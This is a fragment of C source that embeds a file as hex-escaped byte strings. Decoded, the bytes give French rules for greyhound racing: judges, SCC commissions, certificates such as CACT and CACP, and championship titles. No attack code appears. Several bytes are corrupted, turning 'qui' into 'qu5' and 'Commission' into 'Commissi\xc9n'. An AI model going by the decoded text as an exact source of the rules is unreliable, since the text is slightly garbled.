+"\x67\x65\x72\x20\x64\x61\x6e\x73\x20\x6c\x65\x73\x20\x61\x6e\x6e" +"\xe9\x65\x73\x20\xe0\x20\x76\x65\x6e\x69\x72\x2e\x0d\x0d\x09\x54" +"\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73\x65\x20\x3a\x0d\x49" +"\x6c\x20\x65\x73\x74\x20\x63\x61\x6c\x63\x75\x6c\xe9\x20\x61\x6e" +"\x6e\x75\x65\x6c\x6c\x65\x6d\x65\x6e\x74\x20\x70\x6f\x75\x72\x20" +"\x63\x68\x61\x71\x75\x65\x20\x70\x69\x73\x74\x65\x2c\x20\x72\x61" +"\x63\x65\x2c\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65\x2c\x20\x64" +"\x65\x20\x66\x61\xe7\x6f\x6e\x20\xe0\x20\x75\x6e\x69\x66\x6f\x72" +"\x6d\x69\x73\x65\x72\x20\x6c\x65\x73\x20\x72\xe9\x73\x75\x6c\x74" +"\x61\x74\x73\x2e\x20\x43\x68\x61\x71\x75\x65\x20\x63\x61\x74\xe9" +"\x67\x6f\x72\x69\x65\x20\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65" +"\x20\x63\x6f\x72\x72\x65\x73\x70\x6f\x6e\x64\x20\xe0\x20\x31\x2c" +"\x20\x32\x2c\x20\x33\x2c\x20\x34\x20\x73\x65\x63\x6f\x6e\x64\x65" +"\x73\x20\x70\x61\x72\x20\x72\x61\x70\x70\x6f\x72\x74\x20\x61\x75" +"\x20\x74\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73\x65\x2e\x20" +"\x54\x6f\x75\x73\x20\x6c\x65\x73\x20\x6c\xe9\x76\x72\x69\x65\x72" +"\x73\x20\x41\x20\x64\x6f\x69\x76\x65\x6e\x74\x20\x70\x6f\x75\x76" +"\x6f\x69\x72\x20\x66\x69\x67\x75\x72\x18\x72\x20\x68\x6f\x6e\x6f" +"\x72\x61\x62\x6c\x65\x6d\x65\x6e\x74\x20\x61\x75\x20\x6e\x69\x76" +"\x65\x61\x75\x20\x69\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61" +"\x6c\x20\x73\x61\x6e\x73\x20\x70\x72\xe9\x74\x65\x6e\x64\x72\x65" +"\x20\x66\x6f\x72\x63\x65\x6d\x65\x6e\x74\x20\x61\x75\x20\x70\x6f" +"\x64\x69\x75\x6d\x2e\x0d\x0d\x09\x43\x68\x65\x66\x20\x64\x65\x20" +"\x70\x69\x73\x74\x65\x20\x3a\x0d\x43\x27\x65\x73\x74\x20\x6c\x65" +"\x20\x72\x65\x73\x70\x6f\x6e\x73\x61\x62\x6c\x65\x20\x74\x65\x63" +"\x68\x6e\x69\x71\x75\x65\x20\x64\x65\x20\x6c\x61\x20\x6a\x6f\x75" +"\x72\x6e\xe9\x65\x20\x65\x74\x20\x6c\x61\x20\x73\x65\x75\x6c\x65" +"\x20\x70\x65\x72\x73\x6f\x6e\x6e\x65\x20\x68\x61\x62\x69\x6c\x69" +"\x74\xe9\x65\x20\xe0\x20\x72\x65\x63\x65\x76\x6f\x69\x72\x20\x76" 
+"\x6f\x73\x20\x64\x6f\x6c\xe9\x61\x6e\x63\x65\x73\x20\x6f\x75\x20" +"\x72\xe9\x63\x6c\x61\x6d\x61\x74\x69\x6f\x6e\x73\x2e\x20\x49\x6c" +"\x20\x6c\x65\x73\x20\xe9\x63\x61\x72\x74\x65\x20\x6f\x75\x20\x6c" +"\x65\x73\x20\x74\x72\x61\x6e\x73\x6d\x65\x74\x20\x61\x75\x20\x6a" +"\x75\x67\x65\x20\x71\x75\x35\x20\x61\x20\x73\x65\x75\x6c\x20\x70" +"\x6f\x75\x76\x6f\x69\x72\x20\x64\x65\x20\x64\xe9\x63\x69\x73\x69" +"\x6f\x6e\x2e\x0d\x0d\x09\x4a\x75\x67\x65\x20\x3a\x0d\x4c\x65\x20" +"\x6a\x75\x67\x65\x20\x65\x73\x74\x20\x75\x6e\x20\x65\x78\x70\x65" +"\x72\x74\x20\x71\x75\x69\x20\x61\x20\x70\x61\x73\x73\xe9\x20\x75" +"\x6e\x20\x65\x78\x61\x6d\x65\x6e\x20\x64\x65\x76\x61\x6e\x74\x20" +"\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x4c\xe9" +"\x76\x72\x69\x65\x72\x73\x2c\x20\x70\x75\x69\x73\x20\x75\x6e\x20" +"\x61\x75\x74\x72\x65\x20\x65\x6e\x20\x45\x63\x6f\x6c\x65\x20\x56" +"\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65\x20\x61\x70\x72\xe8\x73" +"\x20\x75\x6e\x20\x73\x74\x61\x67\x65\x20\x64\x65\x20\x33\x20\x6a" +"\x6f\x75\x72\x73\x2c\x20\x70\x75\x69\x73\x20\x61\x20\x65\x78\x65" +"\x72\x63\xe9\x20\x61\x75\x70\x72\xe8\x73\x20\x64\x27\x75\x6e\x20" +"\x6a\x75\x67\x65\x20\x71\x75\x61\x6c\x69\x66\x69\xe9\x20\x28\x61" +"\x73\x73\x65\x73\x73\x6f\x72\x61\x74\x29\x2c\x20\x70\x75\x69\x73" +"\x20\x69\x6c\x20\x65\x73\x74\x20\x70\x72\x6f\x70\x6f\x73\xe9\x20" +"\x70\x61\x72\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f" +"\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\xe0\x20\x6c\x61\x20" +"\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x64\x65\x73\x20\x4a" +"\x75\x67\x65\x73\x20\x64\x65\x20\x6c\x61\x20\x53\x43\x43\x2e\x20" +"\x49\x6c\x20\x70\x6f\x75\x72\x72\x61\x20\x61\x6c\x6f\x72\x73\x20" +"\x6a\x75\x67\x65\x72\x20\x6c\x65\x73\x20\xe9\x70\x72\x65\x75\x76" +"\x65\x73\x20\x6f\x72\x64\x69\x6e\x61\x69\x72\x65\x73\x20\x61\x76" +"\x61\x6e\x74\x20\x64\x27\xea\x74\x72\x65\x20\x71\x75\x61\x6c\x69" +"\x66\x69\xe9\x2e\x20\x55\x6e\x20\x70\x61\x72\x63\x6f\x75\x72\x73" 
+"\x20\x6c\x6f\x6e\x67\x2c\x20\x63\x6f\x6d\x70\x6c\x65\x78\x65\x2c" +"\x20\x70\xe9\x6e\x69\x62\x6c\x65\x20\x71\x75\x69\x20\x6d\xe9\x72" +"\x69\x74\x65\x20\x76\x6f\x74\x72\x65\x20\x63\x6f\x75\x72\x74\x6f" +"\x69\x73\x69\x65\x2e\x0d\x0d\x09\x45\x78\x70\x65\x72\x74\x20\x51" +"\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x65\x75\x72\x20\x3a\x0d\x34" +"\x20\x61\x75\x20\x6d\x61\x78\x69\x6d\x75\x6d\x20\x70\x61\x72\x20" +"\x43\x6c\x75\x62\x2c\x20\x70\x6c\x75\x73\x20\x6c\x65\x73\x20\x6a" +"\x75\x67\x65\x73\x20\x71\x75\x61\x6c\x69\x66\x69\xe9\x73\x2c\x20" +"\x70\x72\x6f\x70\x6f\x73\xe9\x73\x20\x70\x61\x72\x20\x6c\x65\x20" +"\x43\x6c\x75\x62\x2e\x20\x49\x6c\x20\x73\x75\x62\x69\x74\x20\x75" +"\x6e\x20\x65\x78\x61\x6d\x65\x6e\x20\x74\x68\xe9\x6f\x72\x69\x71" +"\x75\x65\x20\x65\x74\x20\x70\x72\x61\x74\x69\x71\x75\x65\x20\x64" +"\x65\x76\x61\x6e\x74\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73" +"\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x71\x75\x69" +"\x20\x6c\x65\x20\x6e\x6f\x6d\x6d\x65\x2e\x20\x4c\x65\x20\x50\x72" +"\xe9\x73\x69\x64\x65\x6e\x74\x20\x64\x75\x20\x43\x6c\x75\x62\x20" +"\x6f\x75\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\xc9\x6e" +"\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x70\x65\x75\x76\x65\x6e" +"\x74\x20\x6c\x65\x20\x72\x65\x6c\x65\x76\x65\x72\x20\x64\x65\x20" +"\x73\x61\x20\x66\x6f\x6e\x63\x74\x69\x6f\x6e\x2c\x20\x71\x75\x69" +"\x20\x65\x73\x74\x20\x64\xe9\x6c\x69\x63\x61\x74\x65\x20\x65\x74" +"\x20\x6c\x6f\x75\x72\x64\x65\x2e\x0d\x0d\x09\x43\x6f\x6d\x6d\x69" +"\x73\x73\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x3a" +"\x0d\x0d\x45\x6c\x6c\x65\x20\x63\x6f\x6d\x70\x72\x65\x6e\x64\x20" +"\x75\x6e\x65\x20\x64\x69\x7a\x61\x69\x6e\x65\x20\x64\x65\x20\x70" +"\x65\x72\x73\x6f\x6e\x6e\x65\x73\x20\x6e\x6f\x6d\x6d\xe9\x65\x73" +"\x20\x70\x6f\x75\x72\x20\x74\x72\x6f\x69\x73\x20\x61\x6e\x73\x20" +"\x70\x61\x72\x20\x6c\x65\x20\x43\x6f\x6d\x69\x74\xe9\x20\x64\x65" +"\x20\x6c\x61\x20\x53\x43\x43\x20\x70\x61\x72\x6d\x69\x20\x73\x65" 
+"\x73\x20\x70\x72\x6f\x70\x72\x65\x73\x20\x6d\x65\x6d\x62\x72\x65" +"\x73\x20\x65\x74\x20\x70\x61\x72\x6d\x69\x20\x64\x65\x73\x20\x70" +"\x65\x72\x73\x6f\x6e\x6e\x61\x6c\x69\x74\xe9\x73\x20\x71\x75\x61" +"\x6c\x69\x66\x69\xe9\x65\x73\x2e\x20\x4c\x61\x20\x43\x6f\x6d\x6d" +"\x69\x73\x73\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20" +"\xe9\x6c\x69\x74\x20\xe0\x20\x73\x6f\x6e\x20\x74\x6f\x75\x72\x20" +"\x65\x6e\x20\x73\x6f\x6e\x20\x73\x65\x69\x6e\x20\x64\x69\x76\x65" +"\x72\x73\x65\x73\x20\x70\x65\x72\x73\x6f\x6e\x6e\x65\x73\x2e\x20" +"\x50\x6f\x75\x72\x20\x6c\x61\x20\x70\xe9\x72\x69\x6f\x64\x65\x20" +"\x32\x30\x30\x33\x20\x2d\x20\x32\x30\x30\x36\x2c\x20\x20\x6e\x6f" +"\x75\x73\x20\x61\x76\x6f\x6e\x73\x20\x61\x69\x6e\x73\x69\x20\x3a" +"\x0d\x0d\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x3a\x0d\x2d" +"\x20\x4d\x2e\x20\x48\x65\x72\x6d\x65\x6c\x2c\x20\x43\x6f\x6d\x69" +"\x74\xe9\x20\x53\x43\x43\x2c\x20\x4a\x75\x67\x65\x2e\x0d\x0d\x20" +"\x53\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20\x3a\x0d\x2d\x20\x4d" +"\x6c\x6c\x65\x20\x4d\x6f\x6e\x69\x6f\x74\x2c\x20\x4a\x75\x67\x65" +"\x20\x64\x65\x20\x54\x72\x61\x76\x61\x69\x6c\x2c\x20\x50\x72\xe9" +"\x73\x69\x64\x65\x6e\x74\x65\x20\x64\x75\x20\x43\x4c\x43\x2c\x20" +"\x43\x6f\x6d\x69\x74\xe9\x20\x43\x46\x57\x2c\x20\x43\x6f\x6d\x69" +"\x74\xe9\x20\x43\x46\x50\x4c\x49\x2e\x0d\x53\x65\x63\x72\xe9\x74" +"\x64\x69\x72\x65\x20\x61\x64\x6a\x6f\x69\x6e\x74\x3a\x0d\x2d\x20" +"\x4d\x2e\x20\x46\x61\x75\x72\x65\x2c\x20\x4a\x75\x67\x65\x0d\x0d" +"\x20\x4d\x65\x6d\x62\x72\x65\x73\x20\x3a\x0d\x2d\x20\x4d\x2e\x41" +"\x72\x74\x68\x75\x73\x2c\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74" +"\x20\x64\x65\x20\x6c\x61\x20\x53\x43\x43\x0d\x2d\x20\x4d\x6d\x65" +"\x20\x54\x75\x6d\x61\x2c\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74" +"\x65\x20\x64\x75\x20\x43\x46\x50\x4c\x49\x2c\x20\x50\x72\xe9\x73" +"\x69\x64\x65\x6e\x74\x65\x20\x64\x75\x20\x4e\x41\x4c\x4c\x85\x0d" +"\x2d\x20\x4d\x2e\x20\x41\x69\x6e\x61\x72\x64\x69\x2c\x20\x4a\x75" 
+"\x67\x65\x20\x64\x65\x20\x54\x72\x61\x76\x61\x69\x6c\x2c\x20\x4a" +"\x75\x67\x65\x2c\x20\x20\x0d\x09\x43\x6f\x75\x72\x73\x65\x20\x49" +"\x2e\x54\x2e\x20\x3a\x0d\x43\x6f\x75\x72\x73\x65\x20\x69\x6e\x74" +"\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x2e\x0d\x0d\x09\x4c" +"\x69\x63\x65\x6e\x63\x65\x20\x3a\x0d\x41\x6e\x63\x69\x65\x6e\x6e" +"\x65\x20\x61\x70\x70\x65\x6c\x6c\x61\x74\x69\x6f\x6e\x20\x64\x65" +"\x20\x6c\x61\x20\x6c\x69\x63\x65\x6e\x63\x65\x20\x69\x6e\x74\x65" +"\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x2e\x0d\x43\x6f\x72\x72" +"\x65\x73\x70\x6f\x6e\x64\x20\x61\x75\x20\x6e\x6f\x8c\x76\x65\x61" +"\x75\x20\x63\x61\x72\x6e\x65\x74\x20\x31\x39\x39\x30\x2e\x0d\x0d" +"\x09\x42\x41\x43\x20\x3a\x0d\x44\x6f\x63\x75\x6d\x65\x6e\x74\x20" +"\x61\x74\x74\x65\x73\x74\x61\x6e\x74\x20\x6c\x61\x20\x63\x61\x70" +"\x61\x63\x69\x74\xe9\x20\x64\x65\x20\x63\x6f\x75\x72\x69\x72\x20" +"\x65\x6e\x20\x72\x61\x63\x69\x6e\x67\x20\x65\x74\x20\x50\x56\x4c" +"\x2e\x20\x41\x75\x74\x72\x65\x66\x6f\x69\x73\x20\x43\x41\x54\x2e" +"\x0d\x0d\x09\x42\x50\x56\x20\x3a\x0d\x44\x6f\x63\x75\x6d\x65\x6e" +"\x74\x20\x61\x74\x74\x65\x73\x74\x61\x6e\x74\x20\x6c\x61\x20\x63" +"\x61\x70\x61\x63\x69\x74\xe9\x20\x64\x65\x20\x63\x6f\x75\x72\x69" +"\x72\x20\x65\x6e\x20\x50\x56\x4c\x2e\x20\x41\x75\x74\x72\x65\x66" +"\x6f\x69\x73\x20\x43\x41\x54\x50\x2e\x0d\x0d\x09\x43\x41\x43\x54" +"\x20\x3a\x0d\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x20\x64\x27" +"\x41\x70\x74\x69\x74\x75\x64\x65\x20\x61\x75\x20\x43\x68\x61\x6d" +"\x70\x69\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x54\x72\x61\x76\x61" +"\x69\x6c\x2e\x0d\x44\xe9\x63\x65\x72\x6e\xe9\x20\x61\x75\x20\x76" +"\x61\x69\x6e\x71\x75\x65\x75\x72\x20\x64\x65\x20\x6c\x61\x20\x63" +"\x61\x74\xe9\x67\x6f\x72\x69\x65\x20\x41\x2e\x0d\x0d\x09\x52\x43" +"\x41\x43\x54\x20\x3a\x0d\x52\xe9\x73\x65\x72\x76\x65\x20\x64\x65" +"\x20\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x20\x64\x27\x41\x70" +"\x74\x69\x74\x75\x64\x65\x20\x61\x75\x20\x43\x68\x61\x6d\x70\x69" 
+"\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x54\x72\x61\x76\x61\x69\x6c" +"\x2e\x0d\x44\xe9\x63\x65\x72\x6e\xe9\x20\x61\x75\x20\x73\x65\x63" +"\x6f\x6e\x64\x20\x64\x65\x20\x6c\x61\x20\x63\x61\x74\xe9\x67\x6f" +"\x72\x69\x65\x20\x41\x2e\x20\x49\x6c\x20\x73\x65\x20\x74\x72\x61" +"\x6e\x73\x66\x6f\x72\x6d\x65\x20\x65\x6e\x20\x43\x41\x43\x54\x20" +"\x73\x69\x20\x6c\x65\x20\x76\x61\x69\x6e\x71\x75\x65\x75\x72\x20" +"\x65\x73\x74\x20\x75\x6e\x20\x63\x68\x61\x6d\x70\x69\x6f\x6e\x20" +"\x68\x6f\x6d\x6f\x6c\x6f\x67\x75\xe9\x2e\x0d\x0d\x09\x43\x41\x43" +"\x50\x20\x3a\x0d\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x20\x64" +"\x27\x41\x70\x74\x69\x74\x75\x64\x65\x20\x61\x75\x20\x43\x68\x61" +"\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x50\x6f\x75\x72" +"\x73\x75\x69\x74\x65\x2e\x0d\x44\xe9\x63\x65\x72\x6e\xe9\x20\x61" +"\x75\x20\x76\x61\x69\x6e\x71\x75\x65\x75\x72\x20\x64\x27\x75\x6e" +"\x65\x20\x45\x50\x56\x4c\x2c\x20\x61\x79\x61\x6e\x74\x20\x75\x6e" +"\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20\x64\x65\x20\x32\x35\x20\x70" +"\x6f\x69\x6e\x74\x73\x2e\x0d\x0d\x09\x52\x43\x41\x43\x50\x20\x3a" +"\x0d\x52\xe9\x73\x65\x72\x76\x65\x20\x64\x65\x20\x43\x65\x72\x74" +"\x69\x66\x69\x63\x61\x74\x20\x64\x27\x41\x70\x74\x69\x74\x75\x64" +"\x65\x20\x61\x75\x20\x43\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74" +"\x20\x64\x65\x20\x50\x6f\x75\x72\x73\x75\x69\x74\x65\x2e\x0d\x44" +"\xe9\x63\x65\x72\x6e\xe9\x20\x61\x75\x20\x73\x65\x63\x6f\x6e\x64" +"\x2c\x20\x61\x79\x61\x6e\x74\x20\x75\x6e\x20\x6d\x69\x6e\x69\x6d" +"\x75\x6d\x20\x64\x65\x20\x32\x35\x20\x70\x6f\x69\x6e\x74\x73\x2e" +"\x0d\x0d\x09\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74\x20\x3a\x0d\x4c" +"\xe9\x76\x72\x69\x65\x72\x20\x63\x6c\x61\x73\x73\xe9\x20\x41\x20" +"\x61\x75\x20\x63\x68\x72\x6f\x6e\x6f\x6d\xe8\x74\x72\x65\x20\x6f" +"\x75\x20\x61\x79\x61\x6e\x74\x20\x64\x65\x20\x33\x33\x20\xe0\x20" +"\x32\x33\x20\x70\x6f\x69\x6e\x74\x73\x20\x70\x6f\x75\x72\x20\x6c" +"\x61\x20\x50\x56\x4c\x2e\x0d\x0d\x09\x54\x72\xe8\x73\x20\x42\x6f" 
+"\x6e\x20\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20\x63\x6c\x61\x73" +"\x73\xe9\x20\x65\x6e\x20\x42\x20\x6f\x75\x20\x61\x79\x61\x6e\x74" +"\x20\x64\x65\x20\x32\x32\x20\xe0\x20\x31\x38\x20\x70\x6f\x69\x6e" +"\x74\x73\x20\x70\x6f\x75\x72\x20\x6c\x61\x20\x50\x56\x4c\x2e\x0d" +"\x0d\x09\x42\x6f\x6e\x20\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20" +"\x63\x6c\x61\x73\x73\xe9\x20\x65\x6e\x20\x43\x20\x6f\x75\x20\x61" +"\x79\x61\x6e\x74\x20\x64\x65\x20\x31\x37\x20\xe0\x20\x31\x30\x20" +"\x70\x6f\x69\x6e\x74\x73\x20\x70\x6f\x75\x72\x20\x6c\x61\x20\x50" +"\x56\x4c\x2e\x0d\x0d\x09\x41\x73\x73\x65\x7a\x20\x42\x6f\x6e\x20" +"\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20\x63\x6c\x61\x73\x73\xe9" +"\x20\x65\x6e\x20\x44\x2e\x0d\x0d\x09\x49\x6e\x74\x65\x72\x6e\x61" +"\x74\x69\x6f\x6e\x61\x6c\x20\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72" +"\x20\x61\x79\x61\x6e\x74\x20\x65\x66\x66\x65\x63\x74\x75\xe9\x20" +"\x75\x6e\x20\x70\x61\x72\x63\x6f\x75\x72\x73\x20\x70\x6c\x75\x73" +"\x20\x72\x61\x70\x69\x64\x65\x20\x71\x75\x65\x20\x6c\x65\x20\x74" +"\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73\x65\x20\x65\x74\x20" +"\x6d\x65\x73\x75\x72\xe9\x20\x70\x61\x72\x20\x75\x6e\x20\x70\x72" +"\x6f\x63\xe9\x64\xe9\x20\xe9\x6c\x65\x63\x74\x72\x69\x71\x75\x65" +"\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69\x6f\x6e\x20\x64\x65\x20" +"\x54\x72\x61\x76\x61\x69\x6c\x20\x45\x4e\x43\x20\x3a\x0d\x53\x75" +"\x72\x20\x6c\x65\x20\x70\x65\x64\x69\x67\x72\x65\x65\x2c\x20\x69" +"\x6c\x20\x79\x20\x61\x75\x72\x61\x20\xad\x63\x72\x69\x74\x20\x3a" +"\x20\x43\x48\x54\x2e\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20\x61\x79" +"\x61\x6e\x74\x20\x72\xe9\x61\x6c\x69\x73\xe9\x20\x73\x75\x72\x20" +"\x33\x20\x70\x69\x73\x74\x65\x73\x20\x64\x69\x66\x66\xe9\x72\x65" +"\x6e\x74\x65\x73\x20\x3a\x0d\x20\x09\x2d\x20\x4c\x65\x20\x43\x41" +"\x43\x54\x20\x64\x65\x20\x6c\x27\xe9\x70\x72\x65\x75\x76\x65\x20" +"\x64\x65\x20\x43\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x2c\x0d" +"\x09\x2d\x20\x55\x6e\x20\x43\x41\x43\x54\x20\x65\x6e\x20\x53\x70" 
+"\xe9\x63\x69\x61\x6c\x65\x2c\x0d\x20\x09\x2d\x20\x55\x6e\x20\x61" +"\x75\x74\x72\x65\x20\x43\x41\x43\x54\x2c\x0d\x20\x09\x2d\x20\x55" +"\x6e\x20\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74\x0d\x09\x2d\x20\x55" +"\x6e\x20\x54\x72\xe8\x73\x20\x42\x6f\x6e\x20\x65\x6e\x20\x65\x78" +"\x70\x6f\x73\x69\x74\x69\x6f\x6e\x20\x65\x6e\x20\x46\x72\x61\x6e" +"\x63\x65\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69\x6f\x6e\x20\x64" +"\x65\x20\x54\x72\x61\x76\x61\x69\x6c\x20\x50\x56\x4c\x20\x3a\x0d" +"\x53\x75\x72\x20\x6c\x65\x20\x70\x65\x64\x69\x67\x72\x65\x65\x2c" +"\x20\x69\x6c\x20\x79\x20\x61\x75\x72\x61\x20\xe9\x63\x72\x69\x74" +"\x20\x3a\x20\x54\x50\x4f\x2e\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20" +"\x61\x79\x61\x6e\x74\x20\x72\xe9\x61\x6c\x69\x73\xe9\x20\x61\x76" +"\x65\x63\x20\x33\x20\x6a\x75\x67\x65\x73\x20\x64\x69\x66\x66\xe9" +"\x72\x65\x6e\x74\x73\x20\x3a\x0d\x20\x09\x2d\x20\x4c\x65\x20\x43" +"\x41\x43\x50\x20\x64\x65\x20\x6c\x27\xe9\x70\x72\x65\x75\x76\x65" +"\x20\x64\x65\x20\x43\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x2c" +"\x0d\x09\x2d\x20\x55\x6e\x20\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74" +"\x20\x65\x6e\x20\x53\x70\xe9\x63\x69\x61\x6c\x65\x2c\x0d\x20\x09" +"\x2d\x20\x55\x6e\x20\x61\x75\x74\x72\x65\x20\x43\x41\x43\x50\x2c" +"\x0d\x09\x2d\x20\x55\x6e\x20\x54\x72\xe8\x73\x20\x42\x6f\x6e\x20" +"\x65\x6e\x20\x65\x78\x70\x6f\x73\x69\x74\x69\x6f\x6e\x20\x65\x6e" +"\x20\x46\x72\x61\x6e\x63\x65\x2e\x0d\x0d\x4c\x61\x20\x64\x65\x6d" +"\x61\x6e\x64\x65\x20\x64\x92\x68\x6f\x6d\x6f\x6c\x6f\x67\x61\x74" +"\x69\x6f\x6e\x20\x64\x65\x76\x72\x61\x20\xea\x74\x72\x65\x20\x72" +"\xe9\x61\x6c\x69\x73\xe9\x65\x20\x6f\x62\x6c\x69\x67\x61\x74\x6f" +"\x69\x72\x65\x6d\x65\x6e\x74\x20\x64\x61\x6e\x73\x20\x6c\x65\x73" +"\x20\x36\x20\x6d\x6f\x69\x73\x20\x71\x75\x69\x20\x73\x75\x69\x76" +"\x65\x6e\x74\x20\x6c\x92\x6f\x62\x74\x65\x6e\x74\x69\x6f\x6e\x20" +"\x64\x65\x20\x63\x65\x73\x20\x65\x78\x69\x67\x65\x6e\x63\x65\x73" +"\x20\x61\x75\x73\x73\x69\x20\x62\x69\x65\x6e\x20\x70\x6f\x75\x72" 
+"\x20\x6c\x61\x20\x50\x56\x4c\x20\x71\x75\x65\x20\x70\x6f\x75\x72" +"\x20\x6c\x92\x45\x4e\x43\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69" +"\x6f\x6e\x20\x64\x65\x20\x56\x69\x74\x65\x73\x73\x65\x20\x3a\x0d" +"\x53\x75\x72\x20\x6c\x65\x20\x70\x65\x64\x69\x67\x72\x65\x65\x2c" +"\x20\x69\x6c\x20\x79\x20\x61\x20\xe9\x63\x72\x69\x74\x20\x43\x48" +"\x56\x69\x2e\x0d\x43\x65\x20\x73\x6f\x6e\x74\x20\x6c\x65\x73\x20" +"\x76\x61\x69\x6e\x71\x75\x65\x75\x72\x73\x20\x64\x65\x73\x20\x43" +"\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x73\x20\x64\x65\x20\x74" +"\x79\x70\x65\x20\x55\x49\x43\x4c\x20\x6f\x72\x67\x61\x6e\x69\x73" +"\xe9\x73\x20\x65\x6e\x20\x46\x72\x61\x6e\x63\x65\x20\x70\x65\x6e" +"\x64\x61\x6e\x74\x20\x75\x6e\x65\x20\x64\x69\x7a\x61\x69\x6e\x65" +"\x20\x64\x92\x61\x6e\x6e\xe9\x65\x2e\x0d\x0d\x09\x4c\x61\x75\x72" +"\xe9\x61\x74\x20\x53\x74\x61\x6e\x64\x61\x72\x64\x20\x50\x65\x72" +"\x66\x6f\x72\x6d\x61\x6e\x63\x65\x73\x20\x4c\xe9\x76\x72\x69\x65" +"\x72\x73\x20\x3a\x0d\x20\x53\x75\x72\x20\x6c\x65\x20\x70\x65\x64" +"\x69\x67\x72\x65\x65\x2c\x20\x69\x6c\x20\x79\x20\x61\x20\xe9\x63" +"\x72\x69\x74\x20\x3a\x20\x43\x48\x20\x4c\x53\x50\x0d\x4c\x65\x20" +"\x6c\xe9\x76\x72\x69\x65\x72\x20\x70\x6f\x75\x72\x72\x61\x20\x70" +"\x72\xe9\x74\x65\x6e\x64\x72\x65\x20\xe0\x20\x75\x6e\x20\x73\x65" +"\x75\x6c\x20\x74\x69\x74\x72\x65\x20\x64\x65\x20\x4c\x53\x50\x20" +"\x71\x75\x69\x20\x73\x65\x72\x61\x20\x6f\x62\x74\x65\x6e\x75\x20" +"\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x6c\x65\x20\x72\x61\x63\x69" +; +char file_part2[]= +"\x6e\x67\x2c\x20\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x6c\x61\x20" +"\x50\x56\x4c\x2c\x20\x73\x6f\x69\x74\x20\x6d\x69\x78\x74\x65\x2e" +"\x0d\x0d\x43\x6f\x75\x72\x73\x65\x3a\x0d\x43\x65\x20\x73\x6f\x6e" +"\x74\x20\x6c\x65\x73\x20\x6c\xe9\x76\x72\x69\x65\x72\x73\x20\x61" +"\x79\x61\x6e\x74\x20\x6f\x62\x74\x65\x6e\x75\x20\xe0\x20\x6c\x61" +"\x20\x66\x6f\x69\x73\x20\x64\x65\x20\x67\x72\x61\x6e\x64\x73\x20" +"\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x6e\x20\x45\x78\x70" 
+"\x6f\x73\x69\x74\x69\x6f\x6e\x20\x28\x61\x75\x20\x6d\x6f\x69\x6e" +"\x73\x20\x31\x20\x43\x41\x43\x53\x20\x65\x74\x20\x31\x20\x52\x43" +"\x41\x43\x53\x29\x20\x65\x74\x20\x65\x6e\x20\x63\x6f\x75\x72\x73" +"\x65\x20\x28\x61\x75\x20\x6d\x6f\x69\x6e\x73\x20\x32\x20\x65\x78" +"\x63\x65\x6c\x6c\x65\x6e\x74\x73\x20\x65\x74\x20\x75\x6e\x20\x63" +"\x68\x72\x6f\x6e\x6f\x20\xe9\x6c\x65\x63\x74\x72\x69\x71\x75\x65" +"\x29\x20\x73\x65\x6c\x6f\x6e\x20\x62\x61\x72\xe8\x6d\x65\x20\x63" +"\x6f\x6d\x70\x65\x6e\x73\x61\x74\x65\x75\x72\x2e\x0d\x45\x78\x20" +"\x3a\x20\x32\x20\x65\x78\x63\x65\x6c\x6c\x65\x6e\x74\x73\x20\x65" +"\x74\x20\x70\x61\x72\x74\x69\x63\x69\x70\x61\x74\x69\x6f\x6e\x20" +"\x47\x72\x61\x6e\x64\x20\x50\x72\x69\x78\x20\x53\x43\x43\x20\x73" 